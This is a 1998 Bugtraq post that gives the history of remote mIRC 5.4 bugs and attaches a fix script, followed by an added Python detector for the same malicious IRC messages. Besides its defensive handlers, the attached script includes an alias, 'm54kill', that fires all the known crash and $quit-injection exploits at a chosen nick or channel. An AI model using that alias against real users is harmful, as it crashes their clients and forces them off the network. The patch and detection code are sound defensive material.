Bugtraq mailing list archives
Another NEW mIRC bug and ALL mIRC Exploit patches
From: derek () INFINET COM (Derek Reynolds)
Date: Fri, 24 Jul 1998 08:17:51 -0400
History of Events: (Remote Exploits)

07/18/98 - Someone on DALnet finds problem with DCC SEND and DCC RESUME (exploit made)
07/20/98 - $asctime bug revealed
07/21/98 - myn discovers a large problem with $calc and notices that most scripts that use on ctcpreply ping perform a $calc. He then implements the $asctime bug into on ctcpreply ping, which enables a user to remotely crash the mIRC client
07/22/98 - v9 evaluates myn's bug finding and plays with on ctcpreply some more and finds that $calc evaluates custom aliases or functions.
07/23/98 - Some uninformed person believes that it is on IRCN native and posts a message to rootshell.com and forgets the big picture.

Any mIRC script that makes use of the event "ON CTCPREPLY PING" which does a $calc or any other remote/event that uses $calc is exploitable.

Most people are only patching themselves against the $calc bug, but are still wondering why their mIRC keeps crashing. It's because they have not patched themselves against the 2 other remote mIRC exploits.

Below is the patch for ALL known remote mIRC exploits. To install it, type "/load -rs m54-fix-sploits.mrc"

Peace.
myn@efnet

[Attachment: m54fix-sploits.mrc]

;mIRC 5.4 QuickFIX and Exploits
;myn@efnet - 07/22/98
;Here is the Quick Fix for all known mIRC 5.4 Exploits to date (07/22/98)

;DCC exploit fix
ctcp *:DCC SEND: {
  if $4 == 9582342556 { .ignore -tu300 $wildsite | echo -a * Bad send request from $nick $+ : $+ $address $+ : $3- | halt }
}
ctcp *:DCC RESUME: {
  if $4 == $null { .ignore -tu300 $wildsite | echo -a * Bad send request from $nick $+ : $+ $address $+ : $3- | halt }
}

;ctcpreply ping $asctime crash and $identifier Exploit fix
;replace all instances of the event "on ctcpreply" with the one below
on 1:CTCPREPLY:PING* {
  if (2147483647 isin $2) { echo -a * Incoming ctcpreply asctime exploit from $nick | halt }
  if ($ isin $2-) { echo -a * Incoming ctcpreply identifier exploit --> $2- from $nick | halt }
  echo -a * [ $+ $nick PING reply]: $calc($ctime - $2-) sec(s)
  halt
}

;And as an added bonus for all you DALnet kiddies
;This sends all known mIRC 5.4 exploits at once
alias m54kill {
  if ($1) {
    .ctcpreply $1 ping $!quit(I'm, a, DALnet, KiDDie)
    %ip = $rand(600000000,4294967294)
    .quote privmsg $1 : $+ $chr(1) $+ DCC SEND $r(1,99) $+ .txt %ip $r(113,9000) $+ $chr(1) $+ $lf $+ privmsg $1 : $+ $chr(1) $+ DCC RESUME $r(1,99) $+ .txt $+ $chr(1)
    .ctcpreply $1 ping $!asctime(2147483647)
    echo -a * Sent mIRC kills to $1
    halt
  }
  echo -a * Parms [/m54kill nick/#channel]
}
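Added example, not part of the original post or its attachment: the four checks from the fix script applied to raw IRC protocol lines in Python, as one might do when auditing a server-side or proxy log for these messages. The function names, finding labels and sample lines are constructed for illustration; tokens are split on whitespace the way the script's $1, $2, ... are.

```python
import re

# ":nick!user@host PRIVMSG|NOTICE target :text" as it appears on the wire
LINE_RE = re.compile(
    r"^:(?P<nick>[^!\s]+)\S*\s+(?P<cmd>PRIVMSG|NOTICE)\s+\S+\s+:(?P<text>.*)$")
CTCP = "\x01"  # CTCP messages are wrapped in this delimiter

def classify(raw_line):
    """Return (nick, finding) if a check from the fix script matches, else None."""
    m = LINE_RE.match(raw_line.rstrip("\r\n"))
    if not m or not m.group("text").startswith(CTCP):
        return None
    tok = m.group("text").strip(CTCP).split()  # tok[0] corresponds to $1
    if not tok:
        return None
    nick, cmd, verb = m.group("nick"), m.group("cmd"), tok[0].upper()
    if cmd == "PRIVMSG" and verb == "DCC" and len(tok) >= 2:
        sub = tok[1].upper()
        # "if $4 == 9582342556" in the script's DCC SEND handler
        if sub == "SEND" and len(tok) >= 4 and tok[3] == "9582342556":
            return (nick, "dcc-send")
        # "if $4 == $null" in the script's DCC RESUME handler
        if sub == "RESUME" and len(tok) < 4:
            return (nick, "dcc-resume")
    if cmd == "NOTICE" and verb.startswith("PING"):  # CTCP replies are NOTICEs
        # Same order as the script: the 2147483647 check, then "$" anywhere
        if len(tok) >= 2 and "2147483647" in tok[1]:
            return (nick, "ping-asctime")
        if any("$" in t for t in tok[1:]):
            return (nick, "ping-identifier")
    return None

def scan(lines):
    """Return the (nick, finding) pairs for all flagged lines, in order."""
    return [hit for hit in map(classify, lines) if hit]

# Constructed sample traffic (not captured from a real network)
SAMPLE = [
    ":alice!a@host.example NOTICE me :\x01PING 901297071\x01",
    ":bob!b@host.example NOTICE me :\x01PING $me\x01",
    ":carol!c@host.example NOTICE me :\x01PING $asctime(2147483647)\x01",
    ":dave!d@host.example PRIVMSG me :\x01DCC RESUME 42.txt\x01",
    ":erin!e@host.example PRIVMSG me :\x01DCC SEND 42.txt 9582342556 1024\x01",
    ":frank!f@host.example PRIVMSG me :\x01DCC RESUME a.txt 1024 0\x01",
]
```

Calling scan(SAMPLE) flags bob, carol, dave and erin and leaves the ordinary PING reply and the well-formed DCC RESUME alone.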